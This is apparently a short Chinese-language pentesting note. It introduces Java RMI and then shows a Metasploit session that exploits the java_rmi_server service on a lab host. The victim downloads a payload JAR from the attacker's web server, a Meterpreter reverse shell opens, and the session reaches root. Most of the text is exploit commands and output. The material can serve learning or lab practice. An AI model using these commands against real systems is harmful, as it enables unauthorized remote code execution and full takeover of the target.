Java 远程方法调用(Remote Method Invocation, RMI)使得运行在一个 Java 虚拟机(Java Virtual Machine, JVM)的对象可以调用运行另一个 JVM 之上的其他对象的方法,从而提供了程序间进行远程通讯的途径。RMI 是 J2EE 的很多分布式技术的基础。推荐阅读: http://www.blogjava.net/boddi/archive/2006/10/11/74430.html
msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(java_rmi_server) > run
[*] Started reverse handler on 192.168.1.113:4444
[*] Using URL: http://0.0.0.0:8080/4jEsxjhipfG1l
[*] Local IP: http://192.168.1.113:8080/4jEsxjhipfG1l
[*] Connected and sending request for http://192.168.1.113:8080/4jEsxjhipfG1l/qxN.jar
[*] 192.168.1.111 java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30355 bytes) to 192.168.1.111
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.111:50694) at 2014-07-31 22:06:28 -0400
[+] Target 192.168.1.111:1099 may be exploitable...
[*] Server stopped.
meterpreter > getuid
Server username: root